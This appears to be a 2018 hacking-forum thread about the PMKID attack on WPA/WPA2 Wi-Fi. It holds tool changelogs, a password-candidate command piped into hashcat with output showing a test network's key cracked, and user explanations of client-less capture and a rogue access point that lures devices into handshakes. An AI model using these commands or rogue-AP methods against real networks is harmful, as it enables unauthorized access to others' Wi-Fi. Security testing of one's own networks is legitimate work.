New attack on WPA/WPA using PMKID

In order to make use of this new attack you need the following tools:
hcxdumptool v4.2.0 or higher
hcxtools v4.2.0 or higher
hashcat v4.2.0 or higher

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follow:
- No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
- No more waiting for a complete 4-way handshake between the regular user and the AP
- No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
- No more eventual invalid passwords sent by the regular user
- No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
- No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
- No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string

Source and more info: https://hashcat.net/forum/thread-7717-post-41427.html#pid41427
Hcxtools update: https://hashcat.net/forum/thread-6661-post-41341.html#pid41341
Hashcat update: https://hashcat.net/forum/thread-7711-post-41425.html#pid41425


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 07 Aug 2018 @ 21:59:32

New article: https://thehackernews.com/2018/08/how-to-hack-wifi-password.html


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Fri, 31 Aug 2018 @ 00:23:24

30.08.2018
==========
hcxdumptool update.
iw functionality added!
Now hcxdumptool will set monitor mode and bring up interface!
Previous interface settings will be restored, when hcxdumptool terminated.

More info: https://hashcat.net/forum/thread-6661-post-41832.html#pid41832


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 126
Team:
Reputation: 6 Reputation
Offline
Fri, 31 Aug 2018 @ 04:01:13

Is this included in hashcat?


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Fri, 31 Aug 2018 @ 20:27:44

No. This tool not included in hashcat.
But hcxtools is closely synced to hashcat git branch (that means: latest hcxtools matching on latest hashcat beta) and John the Ripper git branch "bleeding-jumbo".


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 04 Sep 2018 @ 19:51:31

hcxdumptool update - 04.09.2018
==========
improved rcascan (show time and access points which hide their ESSID)
prepare detection of PMF
refactored access point handling
handle 4096 access points simultaneously
refactored client handling
handle 4096 clients simultaneously
speed up retrieving PMKIDs (< 1 minute)
attack access points which hide their ESSID
increased filter list line length
increased filter list maximum entries
added option to show beacons in status output:
--enable_status= digit : enable status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATON
8: ASSOCIATION
16: BEACON

added option to choose station chipset:
--station_chipset digit : use this chipset for station
0: transmit no chipset information (default)
1: Broadcom
2: Apple-Broadcom
3: Sonos


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 22 Sep 2018 @ 10:37:48

hxcpsktool -- support for PMKID hash file
Note: hcxpsktool is a part of hcxtools.

This version is experimental and not all functions (from wlanhcx2psk) are implemented, yet.

root@HELIUM-XR02:/usr/local/src/hcxtools# hcxpsktool -h
hcxpsktool 4.2.1 (C) 2018 ZeroBeat
usage:
hcxpsktool options

Options:
-i file : input EAPOL hash file (hccapx)
-z file : input PMKID hash file
-e file : input ESSID
-b file : input MAC access point
format: 112233445566
-o file : output PSK file
default: stdout
output list must be sorted unique!

hcxpsktool calculates about 5 MB wordlist with possible candiates of MAC and ESSID combinations (will be committed soon on github)
The following variants are implemented, yet.

COMMAND: "hcxpsktool -b 001122334455 -e networkname -o candidates.txt"

https://transfer.sh/1n0Cc/candidates.txt

Usage:
root@HELIUM-XR02:/usr/local/src/hcxcalc# hcxpsktool -e freeroute -b 112233445566 | hashcat --force -m 2500 test.hccapx

fc1e13ef6c24866848dc38113fc1b7a0:112233445566:aabbccddeeff:freeroute:freeroute2018

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: freeroute (AP:11:22:33:44:55:66 STA:aa:bb:cc:dd:ee:ff)
Time.Started.....: Sat Sep 22 11:18:35 2018 (4 mins, 1 sec)
Time.Estimated...: Sat Sep 22 11:22:36 2018 (0 secs)
Guess.Base.......: Pipe
Speed.Dev.#1.....: 268 H/s (7.28ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 64640
Rejected.........: 0
Restore.Point....: 0
Candidates.#1....: 1992freeroute -> FREEROUTE5
HWMon.Dev.#1.....: N/A

Started: Sat Sep 22 11:18:34 2018


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
PixL

Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Team:
Reputation: 10 Reputation
Offline
Sat, 22 Sep 2018 @ 18:23:25

freeroute said:

hxcpsktool -- support for PMKID hash file
Note: hcxpsktool is a part of hcxtools.

This version is experimental and not all functions (from wlanhcx2psk) are implemented, yet.

root@HELIUM-XR02:/usr/local/src/hcxtools# hcxpsktool -h
hcxpsktool 4.2.1 (C) 2018 ZeroBeat
usage:
hcxpsktool options

Options:
-i file : input EAPOL hash file (hccapx)
-z file : input PMKID hash file
-e file : input ESSID
-b file : input MAC access point
format: 112233445566
-o file : output PSK file
default: stdout
output list must be sorted unique!

hcxpsktool calculates about 5 MB wordlist with possible candiates of MAC and ESSID combinations (will be committed soon on github)
The following variants are implemented, yet.

COMMAND: "hcxpsktool -b 001122334455 -e networkname -o candidates.txt"

https://transfer.sh/1n0Cc/candidates.txt

Usage:
root@HELIUM-XR02:/usr/local/src/hcxcalc# hcxpsktool -e freeroute -b 112233445566 | hashcat --force -m 2500 test.hccapx

fc1e13ef6c24866848dc38113fc1b7a0:112233445566:aabbccddeeff:freeroute:freeroute2018

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: freeroute (AP:11:22:33:44:55:66 STA:aa:bb:cc:dd:ee:ff)
Time.Started.....: Sat Sep 22 11:18:35 2018 (4 mins, 1 sec)
Time.Estimated...: Sat Sep 22 11:22:36 2018 (0 secs)
Guess.Base.......: Pipe
Speed.Dev.#1.....: 268 H/s (7.28ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 64640
Rejected.........: 0
Restore.Point....: 0
Candidates.#1....: 1992freeroute -> FREEROUTE5
HWMon.Dev.#1.....: N/A

Started: Sat Sep 22 11:18:34 2018

So this assumes the PSK might have been produced by some algorithm which uses the SSID and MAC, how common is this?


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 29 Sep 2018 @ 12:48:28

hcxtools update
29.09.2018
==========

hcxpcaptool: removed option -Z
Allow hashfile for -m 16800 to be used with -m 16801

https://github.com/hashcat/hashcat/commit/1b980cf01000c81dfd0ca085593f8c1d66d43188


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
payknight

Status: Cracker
Joined: Wed, 13 Apr 2016
Posts: 502
Team: just4fun
Reputation: 349 Reputation
Offline
Sat, 29 Sep 2018 @ 13:22:13

just to make sure i will explain what what app-less mean and what client-less mean. (if i am wrong correct me)


client less mean, that the router aka AP it self send a PKMID to whoever is trying to connect to it which is a eapol packet , so even if there is no client attached to the AP , u "as an attacker/pen test" aka hcxdumptool will try itself to connect to the ap to see if it send a pkmid. if it does it will show pkmid found.
again , u will receive the pkmid ONLY when the ap is near by and vulnerable(by sending the pkmid)


ap-less mean, if a phone/pc/device do a probe request and in his prob request (broadcast request) there is a name hcxdumptool will create an fake AP with the same ESSID so when the device see that AP it will try to connect to it, hcxdumptool then catch the handshake and close/turning off that fake AP .


+rep if i helped
BTC : 1PAyKniGHt7yyCb8HdsziTHBEFX6zkGSHz

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 29 Sep 2018 @ 13:40:32

Thanks.
It is correct.
In the case "Client-less" attack we can get/capture only unauthenticated handshakes.(M1/M2), because we are not able to calculate a M3.


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
meso

Status: Banned
Joined: Wed, 19 Sep 2018
Posts: 25
Team:
Reputation: 0 Reputation
Offline
Sat, 29 Sep 2018 @ 13:48:10

WARNING! User is BANNED and maybe a SCAMMER.

This is great, so we can use AP-less attack to get handshake by
using different BSSID to one from true AP?


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 29 Sep 2018 @ 14:00:26

meso said:

This is great, so we can use AP-less attack to get handshake by
using different BSSID to one from true AP?

Yes. This is correct.

Great thread in this topic:
https://hashcat.net/forum/thread-6661-page-6.html
https://hashcat.net/forum/thread-6745-post-36007.html#pid36007


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp


45 Results - Page 1 of 2 -
1 2

We have a total of 163285 messages in 20499 topics.
We have a total of 19265 registered users.
Our newest registered member is Bohemian.